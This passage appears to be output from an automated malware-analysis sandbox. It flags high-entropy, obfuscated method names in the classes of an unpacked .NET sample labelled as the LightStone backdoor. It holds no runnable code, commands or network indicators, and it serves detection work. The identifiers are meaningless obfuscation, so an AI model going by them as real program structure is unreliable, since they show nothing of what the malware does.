                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, O8TvVYenLrmnYxeUPCg.csHigh entropy of concatenated method names: 'Al5tMTWvU0', 'LT9tKZ1boQ', 's3ftqb8UOo', 'RWOtapvZHn', 'AAUt2kyme7', 'Pgc5Idj6cEpVh2Uqi1l', 'UihjikjPCVZrP9RF0a1', 'HETAKujNIb0uDhLgOWJ', 'cW1PDMjgxtso13eFrmM', 'QQEdCqjIfPDGGgPegCK'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, oRjG8mJ2lCXs9DkOfmB.csHigh entropy of concatenated method names: 'VdWQ1Z57jt', 'Wb3QyN3J9n', 'd8rQJYOObT', 'BvyrVqVCFNPNxE8vlxs', 'TFKa60VRBVV3AmsU33R', 'C6vIPAVHHc4PhM88Y2b', 'chINSxV8XYZNoOZvIWn', 'tBvjZxVpJd78Ee2XZvA', 'QcoZHcVNlBQJ2SNAJk7', 'bffcRaVgAQjADd3ha5U'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, xT3Ep46HVKXmApwhrn6.csHigh entropy of concatenated method names: 'ydZ0IKRkMT', 'GDbyYJbZgXHyZptctY9', 'T4xlTjbaA1jhhF5ndHh', 'Q7VXuNbPveklW3dgfV3', 'OTdUR5bIMZ1cJhHHTsy', 'fOOcrTbnUcWPCotCKwI', 'x8xvq4bJWnWonO1AyAX', 'RdKLULbscT6jSVDvEGL', 'Vq0pWNbHHqGDmEyajLc', 'c5kGMjb8SkRf0GwsPcS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Qax6SuJRFWtVFokNj1U.csHigh entropy of concatenated method names: 'nmhQMDcbdV', 'riTQKmrvwg', 'AOjQq4hJ47', 'toRQaIDJr4', 'fgP6JGVcLXAOWWug4Eo', 'V8UU2BVefXAS8fgbvU5', 'aONuBUVVehjsObDRcQU', 'd5BLPFVFZZBUBokIpCG', 'IDXgMPVEex3D8R07G6S', 'fGwPM4VWLqvHF4jdkeq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JqJQvUpedGs8ZBoklE2.csHigh entropy of concatenated method names: 'FSSOHgvqXkw0TKQU0kH', 'jHDXrFvfmV5EOeHqlXO', 'HhsXvwvMMMZphR7RLZC', 'EfVGExvwFfIYnB1clWY', 'iytBkWvUSY1kHSunhyI', 'KUNywYv1i7x5FIGsFP5', 'X0UE8Avv5hy51faagPP', 'IEO1VsvDuigRWfZItKS', 'sVmaAK1zKSv5iUVKQMc', 'Unvi0kvyG9rEhBQdEOf'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, e5eFcPpij8nUPHa7ESx.csHigh entropy of concatenated method names: 'KvCDCPvelIEqZ8Zt4m0', 'P84VwrvV5jwjHXkEHkI', 'kTaU3PvWeFZJ8M7pJit', 'Dhr3Gtv9xmUNRYV5Ujr', 'Pu2YwFvl6d7JnGsEFNI', 'pWrXt8vx1qIahnHn82c', 'ww9vFpv4ysO3nJ52XqH', 'gwGKrHvoetmPa6bptv0', 'Mccs5BvQKLZSfwRJrNl', 'hMnMiPvEcFwINy6YWK4'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, s0LFuJptWYWsnrfE88u.csHigh entropy of concatenated method names: 'e6prNmvPToCjc3kpi5G', 'eoHMhevIL4OaKDej9Il', 'hG8Oo8vZFPfFOH8iUH4', 'kFkS1Eva4Leh2Z817LX', 'MhkofjvnWEa1HmnfTNE', 'f951LJvJXouQmI7jgNh', 'duVEmkvsgjsCcXO22KU', 'MHdgpGvkCd1MQQSnjby', 'c9chqmvLZSuvckNEIr9', 'FWqKdZvgGLihynRH1B6'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.csHigh entropy of concatenated method names: 'BVPGzGXG2n', 'EAUEhpCawp', 'BKuEewZXPf', 'n5dExaDi9d', 'fALE0PnUGL', 'sQREmRtMqE', 'OY1s3', '_236C9', '_55815', '_4h4fn'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, G5Dm0qeomkErKAZ15BS.csHigh entropy of concatenated method names: 'Z4JKq', 'nZ16s', 'p8372', 'zQB8C', '_6a21e', '_24y46', '_6549r', 'Ig3sJ', 'U9Y8A', 'B6665'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, nx8df4p9iJRRO3JF4sd.csHigh entropy of concatenated method names: 'O9qxcGmWdg', 'PHaCDfuTA5njMTgxajG', 'nEkkvhuX2FNWqdmoJE2', 'AeYpRwuvyegjrbK2xjP', 'RkCpq1uDFU4PnkgPfct', 'iUOA4PuBOAbaIlo08qa', 'WD0DMBuuB9UMbUHQJW3', 'o7gwaVuGqL7oAo5oUm9', 'CBcxvsWjVp', 'd9X7EHuhgX7VsvOOBNl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, X448kW6d2bVvVdMgqad.csHigh entropy of concatenated method names: 'S1kywHbrcod03hkdS1F', 'bknnsQbh9fDY3PkwIhY', 'LryI9wb2BFsRWmPN9UI', 'oGOBdtbAchwkDf94Eex', 'cPQRrTbivXaDJvibnA1', 'ELqAyrbKih9XrGQRO3j', 'oPiD4ab7APLijMvPT1G', 'YTLs9tb3rSaHNqNrh7d', 'GsNYVKbtqfXiMLgxXi7', 'trA294bOqTCgvAHdTYE'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, WpF3Dj6EVtorViSduRd.csHigh entropy of concatenated method names: 'pv20jMN8ev', 'fQS0R7980H', 'CJCOVcrI0ZRIh8OjhfO', 'fnJM1Gr6VQ02mw8LJF9', 'XVKdsKrPcsgGE06v0HC', 'gH3XatrZaSn2Jt1OtkY', 'bJf7PgraSkg7haJJpR9', 'kyOS1jrnteklTV89jyE', 'hZddsxrJIqYjgWwQDLB', 'dWwplyrsgNbleUrlubF'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, GbY3fHn3EGuVYP1yqX7.csHigh entropy of concatenated method names: 'TFdsn1nlgO', 'ARysHUwUN5', 'skEsWRJDI9', '_7I451', 'Gky5s', 'i135j', '_73C49', 'gafji', 'u9431', 'XVksOR8bbS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mXCKHYeIKotCYJVfRRA.csHigh entropy of concatenated method names: 'Up3NbtTLDp', 'jowNCaaxL0', 'ReFfcpZfLgIkcKg77YF', 'VqaJcZZMrGeF29KNl1o', 'QDiigeZwxFELdA9MsJx', 'hxMdlaZUA3pgX2WwmA0', 'igwtjEZ1xHrflhKTL3I', 'tgKCd2ZvarTdxkyyoOX', 'AnCLR4ZD4KnjU06kBQN', 'hMtceDZTl5urHYxYgYa'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, xNPv3Z613tp3DHpPW1L.csHigh entropy of concatenated method names: 'OntlQiGmx6m5KPyo5dD', 'SaHntGG0j7fp5pnjXts', 'GpZcRMG5ssvZnvY4XWJ', 'oAvMaHGzUYRlDvSGLrL', 'qlKxhtbyUR4RmaVqjNW', 'rS2q2ZGLA2CFoxdL0FZ', 'q9wZISGSCOWyH11p7Ix'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gVO6hFX7pYdgTcMMkBf.csHigh entropy of concatenated method names: '_82Obu', 'o6612', 'fNmBB8GR7C', 'eWrUtZVp8G', 'DxLBpdTyYP', 'TRBuVR4tQy5p38BAPBN', 'zIZAYs4OKhj7ZsnhctL', 'c4CyeK4YBJ8Y3aNERDl', 'bvycKQ4d9l34KBCDXuE', 'TUIacq4FWqdoCLUj44a'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TPqytTXMQtIsHT78ZZt.csHigh entropy of concatenated method names: '_9J248', 'fYZ3r', '_64w38', 'sEaBcHDYTU', 'JPRBq9xd8B', 'yQtQXn4ot3ARvfgT7XY', 'o3QnsO4QW7lusAK4L9X', 'xyR11A4jK7A37OhwEyt', 'pkSAti4CsQsRtTTT8xN', 'IyoZGb4RjPFLjvVRw6o'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OT69CYXPsJXR301VlIJ.csHigh entropy of concatenated method names: 'G36l1', '_62D97', '_6f6RV', 'anNUWv7kcE', 'ALcBZkNq5l', 'NLkUOQTRCd', 'fqIBWlOAGY', 'bEf9my4ZSn6HtvWaOBN', 'maYJJy4a2hGE58mKJD4', 'v1udig4PCB7mhMRaXfl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, tfDGX0pV7KPBuJJAttT.csHigh entropy of concatenated method names: 'BeW7xRBinIaC6YISMF9', 'UqcPbNBKGl1AQJH7OuB', 'EmxDVeB7NBSBfdROmlP', 'adVSqEB3Zep2N6TuhPB', 'ngoX5tBtAMdQHvPI2Xm', 'aUWw9fBOGqJV2NNmfe5', 'ASqqL5BYD8nqxswFxvs', 'jtqPcfBd0BoZVyGRK7L', 'QWLDQCB2IBqSdakqd7y', 'ua2H2tBAwIRQTwLoToB'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, osEYghXuPiThLGRisEX.csHigh entropy of concatenated method names: 'YyrLNmmXGv', 'RqVDbfQckvDv22myuco', 'UVN58uQele6wZXZBxfM', 'm4exesQFUOsD3RPNKPq', 'qKU9DGQER2q0BJgaT7r', 'A8gUi6B0EZ', 'dpJUvBT9q8', 'SxDU7xj8fy', 'mQSUMWmCAD', 'eDZUKaMVIp'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, vkgoLBJ4kHD8FbqLMHD.csHigh entropy of concatenated method names: 'jHgBMYFegj', 'YbFBSmAXKA', 'RGaBxMchdT', 'iVNBY8cyZm', 'w433AdNM8G', 'h9D3X6vmot', 'kp738CNP2w', 'XPW3niQS0p', 'b42pUGld16JcRLNLtMF', 'ideskdlOOvKJijEVHtl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, I3YwmApsdJ5FPGFxDYr.csHigh entropy of concatenated method names: 'EOpBJPXH8bntWMh2ePr', 'Na79WuX862LMi2XP679', 'lAZMRhXpbBq7RanZc5n', 'Ge71R3XNawAC7umsbIk', 'TEvib5XgpH3WpcvVZ7x', 'C3xTyYX61JowCxJpxvQ', 'YcHNcxXPBOKmyvn0UOn', 'CyZ89rXIC1m3YDbJxXQ', 'Mu12PvXZWNICoxVToqt', 'febPCJXa5V4VP5gFfEr'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, KYePyQ6uoWIdsiXnLmZ.csHigh entropy of concatenated method names: 'TTHmo5Vw1H', 'wP6mNEChCe', 'yxKmG6YPhI', 'd9imEePbrp', 'Pt2mshFJmt', 'P8cmbkkNNF', 'hoHmCRJYrb', 'ScsmZpHiMY', 'jJlm6Vgl0k', 'o7hmpuFGam'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, CHBTh2n1wnW0nvw8wFD.csHigh entropy of concatenated method names: '_38xG9', '_2Rn37', '_26Y3G', '_5h9t6', '_5Wi8d', '_2X4y9', 'Or4W2', 'F7LU7', 'b3aV3', 'gEK3x'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DtiQNXjdBKiyGCOvD7l.csHigh entropy of concatenated method names: 'XKXGeTLevK', 'hlvGxfq8qK', 'qWWG0VJseN', 'fav2ZXZnTNyrjsRYM7r', 'QW9CBHZZdCdybQ505Yx', 'jdJKR5ZaV5nwqvhBbNC', 'IikqRQZJsoY0uKrVjif', 'PsAYtwZsJ25HO0TmTIY', 'ObhSeDZkZW5qe9fm9qL', 'mu9iyHZL3OMw67RoPt3'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, aYaQnSJwulneSmoDLNw.csHigh entropy of concatenated method names: 'NKM34rKGWm', 'XVypTElmCoLeojZQyEY', 'KuLj3Il0EN6RB4jIhtZ', 'EbfbDYl5UGaMdtWxx3R', 'XeQPZhlzgi0w5nHRHV1', 'COU4wylLmTpWBR7aGmm', 'TT08GvlSwapWW1xVTde'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, dUgS0snbvhh3GbZ8DUb.csHigh entropy of concatenated method names: 'AHuPqqLGvlYe6LNJ8lg', 'bUsvYkLb80Q8HRA1wUW', 'KE47MGLB6PIfj18nrpb', 'MbwT2FLuSJJMq4kGPdk', 'lnWsKKq5SK', 'CmcM3', '_9J199', 'RPesq9fGN0', 'l6Ysa7IJkb', 'OEJs2sbFe0'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, LMTmWij3g2SbFk7cM97.csHigh entropy of concatenated method names: 'wmKN9X0i7b', 'KllNzljryU', 'f2mGh019CC', 'RmHOWNZ6htdbPwFvibm', 'sxdMufZNOvMhMWDnJcn', 'gUQ6r1Zgy8fBqkxBoLP', 'e2BqkPZPNyPcZQdM8KT', 'MIZZKcZIdb31pHxxBmx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gcg3sOJSFHrZmotjqRS.csHigh entropy of concatenated method names: 'PNbSi5gwNP', 'eFnSvU9uUw', 'TO7S7yVqCK', 'silSM8U1X5', 'XgxSKbL3vQ', 'lnGBURRju4', 'B4rBoG8GHX', 'jBUBfcyGkK', 'WZEBQvS1go', 'u09BKDON7O'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, PPwvUbpvFfns5Qr3oZQ.csHigh entropy of concatenated method names: 'Pigx5LPRN9', 'v0EinxXqV09viVPEy0L', 'd9amLgXflPXj9oWKfXO', 'dPQTCHTzopujcusXoMm', 'FwRMmhXyh7R190Bp9HU', 'LTIZr6XM8Jj96iWvR0t', 'PQSQ9ZXw5LJCgNmsQNO', 'GHIaiAXUvZ7PkYlK4lM', 's1nWwYX1ysd052XNT90', 'AWGW5XTnppI3iUpMNDf'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, puOhCL6TSKilrZYAMPn.csHigh entropy of concatenated method names: 'dSp0VCWRGS', 'DwBL2JGpdcKa5PTxqCi', 'K8PGTxGN5DqJu3AoBv3', 'PkG5jPGgLc83uwDNtSR', 'r6le9OG6G7qxRUmNIg8', 'qbm6FMGP0LySmJCQGoC', 'McajeBGI4tfxN6dyCHi', 'uMnv6BGZUAU4lBfcZyf', 'EI0Tn7GaMWYbv2WnMRv', 'FOMFZPGne9H9IZCMbLu'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Q5AYRmpBpEZdAUKyh22.csHigh entropy of concatenated method names: 'tvJVFZv0hkuYdeoriWn', 'RDLAjsv5eIGhTn2JWUe', 'jRjQgpvzumVejVJwjhv', 'c5E73eDynI8iLBjEFOP', 'hytEeEDqOBNr9DNFyVQ', 'choTiRDfIIomGarM1ql', 'bHntiTDMjlH96ukla1j', 'KsBOjPDwOSl8eVSoIMl', 'BYf4MjDUuMJkb25E2DN', 'PuWIvuD17gCfhqdZlSs'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, CdsP9kjkxmjYQxmv753.csHigh entropy of concatenated method names: 'cSHEgoabN8f84xN8ON1', 'sT4DxRarKPUFOOyMDT1', 'lGw4LnauEKNrDhP5Fh6', 'zOHewbaG7WFJujia7n7', 'LvX3KEaho36FvvxptlP', 'bEOoRQa2UJYOZIvNVIy', 'lslthdaAd7EdMGcfdrl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, IMsLZqJESnUQpUSitZt.csHigh entropy of concatenated method names: 'eBq65', 'PP238', 'LZDSAWeger', 'PuNSXg5SD8', 'SwIS8herKl', 'yhWSn7jE3l', 'LRlSHv4NbX', 'XmBSWaaxbS', 'kULSOHgf3r', 'nVTSYFwInL'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, dJjx6CM6xZweXYbnH7.csHigh entropy of concatenated method names: 'B5bMGuwbM', 'EFlKyVNIH', 'pb2ZE7MMr45fgJHUZVX', 'Vnfv7oMw5joTlGJJ8pM', 'LyFKuOMqlBaIosoNDdH', 'cWV1ofMfJjESKVGhCLB', 'PUqvP6MU1UcI43bFiD9', 'omEDecfnM1tmnB2gssU', 'Pf0QASfJrQYd4HExZEG', 'VkAcW6fsjpPuKnfsdfS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, fZDaE8XWphCxYK1rG6D.csHigh entropy of concatenated method names: 'SjmLqY0LKC', 'h1oLaOaigq', 'T5JL2lrtRc', 'PKnL1B4lDE', 'JSjLyNvMG3', 'NU1Zb0jvc0jeBAuAkIO', 'Y0RYv3jDN1VJYlwT9q7', 'LGl1DXjU9eRyGMcNxyo', 'KLVYXXj1VEZsq7w1WUA', 'VOOrydjT4N1DQRCpveX'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, kA7kVheXtKfgjQcmYwh.csHigh entropy of concatenated method names: 'w47J3', 'nm6tsdMMf3', 'TdCtbmSojE', 'MDqtCElhso', 'g4CtZdPMCN', 'AmVt6eBWbf', 'Kgetpudu9a', 'sU8JGajlpmwCYm9Ug6n', 'fnmnY4jxppuy99Kw05Y', 'XBwQDujWFpO1IWrQUIO'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, E2GrLInv9OEjUR3px8m.csHigh entropy of concatenated method names: 'gJEZ6uVbLy', '_1Y76E', '_2n9h3', '_36fEX', 'v3aZpP4nQB', '_52X5N', 'wcyZkpmv0g', 'imAZr5OLf4', 'veA7l', 'oOkZusl1Vq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TCLdvBevII8QbvFJE1d.csHigh entropy of concatenated method names: 'eOj6S', '_92951', '_1e8S4', '_2jK67', 'W54Lj', 'm4sAw5LqHM', 'UqxAoXFk43', 'E6sxM', '_83R52', '_4q255'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, KHde81eAUUJNk258utB.csHigh entropy of concatenated method names: 'Rg8ttaPHfN', 'mF2tFQbxQe', 'CtAtAXJJiQ', 'syXYjbjFI1UF0pMedwl', 'fEnkOVjEUOp7xeB2E7H', 'bHp3hHjYpTkaesSrggp', 'mJgm7PjdlNll5025Wtl', 'Pta2SEjcWoC6YZpwp6N', 'LEAhQrjeOYWKZZG0Xsx', 'hIDHnIjVynRRK6yaLso'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, otwGicgTg0LsrtQRY9L.csHigh entropy of concatenated method names: 'uKapkkJRqj', 'zalpr0Gx18', 'R6hputNFX2', 'uampg26bc1', 'a37p4SaS8O', 'GogpBqT0cQ', 'ww9pchMUJL', 'ijKpix4Uh0', 'ghHpvULskQ', 'iuyp7tqMcv'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ps321YXUFJJE9Jgue9H.csHigh entropy of concatenated method names: 'Oe17g', 'VIwBGbUAf0', 'R3WU3lrOgb', 'OHhBsJNeUm', 'eEJycH4UOCC8SylxDqq', 'vna99641JowCP0yuAfm', 'brniYw4vci6CjtegIkY', 'yOGExD4Md2P20qN2tdu', 'u76JUQ4wvDkI5ldQhDi', 'NDJcsK4DnROtRVBLJ9b'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FehONtm44optieloZT.csHigh entropy of concatenated method names: 'Ae9TyhwbPqvkVYLAXro', 'RFUh4awrgsy9tlyVKg7', 'uhxctuwhM1piFSbPS9A', 'oZUZeUw2CjxFwD0GbDT', 'SJUvvtwA7xiN3PMpNqt', 'uDuvdYwi7AH5DSgwbQP', 'oeK6mnwKFeks1gvFITO', 'P6K6ukw7i8lrJDZbY1g', 'jBmajXw3NIOL5EnhS77', 'pkWFb8wtM1AwMMZhwQe'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, zMrJjv4CkNGBY5Btp2.csHigh entropy of concatenated method names: 'ipIlS1UFjkbSAYLcKdh', 'NHxr5IUEFLXD6h0jn0t', 'Qqna0HUYIseLAct1wkG', 'mMqYJDUdFxWaKjH4wmv', 'Q6ietkepF0', 'rXteFSLrfM', 'WqbeA2Ilqo', 'KiWeXcTy85', 'C7ce8PYfBV', 'qMwAexUVNjoeFvxaQOS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, R8gDcpp20IMugdND0dD.csHigh entropy of concatenated method names: 'wVhMrRDzKhm4wBIpB1X', 'FxkncbTycvqKcUtQWb1', 'dZfRKyTqeFL8jiPhDXd', 't8DTIDTfkxjEVvMNhA9', 'RkGto9TMFkrm6dmjRkX', 'lAxwVvTwN7KtL4ZSmRR', 'bnHSyQTU6VPgsMnwOr8', 'umPBPqT1EQYBTRQkUiw', 'gPOljDTvj9TSbXAnc3W', 'Tua1KgTDNg9Zni2SkYx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, g5oiWspbwY0I3PEKHiw.csHigh entropy of concatenated method names: 'IOMhjbDxfuVKoS0FBE9', 'PtimaBD4Tk8iElyJwjq', 'gqIB5EDosmNmmgY7E3h', 'WxkMgHDQMsKAf4HpCl4', 'qlbED6DjfwaSiFSLRnS', 'whINMTDCQuhQnZlaLml', 'PDE0x8DRsjc0jW6tiXI', 'qIuXXlDH9f56Tl3EJb0', 'AHLCyFD8SraJB6d0WN7', 'yWS4jPDprqSeUBsBYAq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, L8CvfGAq7U40dEfP524.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'tvmdfbEivk', 'e4Vddj5UJR', 'GgEdlXM6BG', 'cjedTWa5md', 'r2DdQXBSOU', 'bKT5B9YcRkkWZB9OMjJ', 'ow91x9YeV3cl9VTGkLn', 'SyHc0hYFu3OJnBwm0jL'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, EXvdXNeLe38a7q87AOo.csHigh entropy of concatenated method names: 'SPkXTX4uJQ', 'ClKAK5vVUk', 'a6SAqP5FE4', 'Re4AadqgHW', 'qaPA2vfdcl', 'UseA1Ev0bM', 'w2EAyiuIyW', 'LUYAJIMShP', 'qH4AjZNo3T', 'QrYARVp5TJ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OX8gNUJG8mxYYxf3H4a.csHigh entropy of concatenated method names: 'wIcBhwSuDV', 'oSPBwNHFR4', 'SU5B9Aa6aT', 'sFoBnflFDg', 'RmusWflh6sSMq5iUUPs', 'VlrmNul2L12C66lsFEn', 'HC4ebjlAEpsnNUH2BK9', 'WQKL6YlisqU39UTfyRA', 'I9BDhBlKMoS9C2Uqqg9', 'Vb3JNnlbSxM9jMcog9j'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QL2grUjCL9LYx4NWghg.csHigh entropy of concatenated method names: 'MG4Gt6RtMS', 'rL3GFjiKKA', 'iEqGATp2i3', 'qlNGXLb5Aq', 'jTdG8beqs9', 'hKIGnE06eX', 'yLMGHZk4w2', 'ld5GWumxQM', 'jVJGOjlBtn', 'xBKGYJ2SDx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, iLigcI6eXMwvYq3Rqyx.csHigh entropy of concatenated method names: 'Mre00UayOe', 'fl00mV1lsX', 'deq0D9O53l', 'dM4y4aG2cLYvOo1updE', 'TnM7xSGAHb2yE7avBJm', 'j58TrRGrbk9QKHPnhau', 'oIcBx5Ghy0RKw3FriEf', 'Vy68l5Gia7xVknV6EMU', 'qUsXeTGKjSNF2nh5hZE', 'mx4CvwG7n0rhj2hfDuI'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DC5nLMj0QuivAWvoKMe.csHigh entropy of concatenated method names: 'oOnGDYTQP0', 'KdeGPqtIk4', 'zQ0GfRjWNQ', 'np2GdCEMQG', 'sJrGlEmmVx', 'VQOGTI4rDX', 'WgTdD8Z0m7g6j5WL8mC', 'RO238IZSqkfG6Iuriih', 'VPbpiYZmVdkq9aPsMeR', 'R38sDDZ5ohSe25yfOl9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hcWAmbeDOypWTI632mO.csHigh entropy of concatenated method names: 'n7VXrq2dnZ', 'CmNXgTRKn8', 'enKX5jixTp', 'wcAXIoQ6OE', 'tabXwjMM4b', 'aRgXo1J8af', 'AZlXN8vUP5', 'Y6ZXGJM3Vm', 'kj8XEYDGF9', 'TcVXsnEJ4s'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SEs5x8W1W9AVrylf92.csHigh entropy of concatenated method names: 'YbLk3112P63bXmxvBJ1', 'Yo6R9g1Aapul8wvcCIp', 'xF2uwW1iixpfIFlKoIq', 'KHCwh11KClAqjocaG0F', 'nd4F6Z1710IM0Up2lpp', 'mFPFYB13bTjCStIoGoY', 'SRlKRb1tsxltS1wP0ag', 'PRsPwt1O4ctdwFdXXne', 'd4UB661YMTMVItVpwLh', 'TWr4FU1dYmxQdEOo9TO'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, cTLDEGnr3gFgBnQWwS3.csHigh entropy of concatenated method names: 'KmLr0hTTTKQyM', 'tUE1ZomYjbLPx3bRfZt', 'V22ivNmdNSMpSd8D5qh', 'wTg9HtmF9mqUtOyKHEK', 'IQtX1nmE4UShVD98mUM', 'PMuRE7mcneoBpQucTsR', 'mAxshfmtLmqGpkcGBlF', 'Y2AmWfmOWgFEIPE3cCf', 'jKPhtmmer06tHtgvvaD', 'Bkca51mVCUWQrGDi3FZ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gwxcXy68BwxujC1p2i4.csHigh entropy of concatenated method names: 'h0dmH9OnEc', 'nF4mWwUqDq', 'rycmOQ25pR', 'ACwShT2bkVlLjo6dSFy', 'djNdJf2rX8XeFgs36Jo', 'BUqxRI2uk6C56FFJq69', 'AgOPVd2G1yjilkjMiKi', 'tVv7te2hcWgICe30j9K', 'Cvtqf722uyLu1owxfW0', 'KgAT4L2AYbx6xUMu4Vg'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, qLGDGgAM3fcLErEJhK1.csHigh entropy of concatenated method names: 'B2odhdbAcS', 'OKohqEY2P0DJl53FtLc', 'talhu3YAqMyB6vFtDdD', 'WsGaoeYr0KAdkQw0vws', 'lybhESYhHaPxknUghAv', 'fsZkZRYieLbCLUmQVW4', 'BLTdPuYKl1GDjBmuto7', 'JJly7XY7503UirG04JN', 'HQqvh6Y3fkFeIMSKpr9', 'SZD7olYtPaDEKTFL6pK'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, NFw1LVJnX1jvuRGynUV.csHigh entropy of concatenated method names: 'aoJTN7Ci67', 'w0wTGYsQMB', 'SG7LUaEKg7q6fJSDngI', 'EcvcZrEAxI4hbHNbpM8', 'FarmJmEi9smHG9LEfXH', 'peJypbE7fDrUJvYDSyb', 'Tlhu4fE3KOaXFjpEEgZ', 'bDNAadEtO6wsMNUJJsp', 'NuxTWq5ZRK', 'jDdTOecAW4'
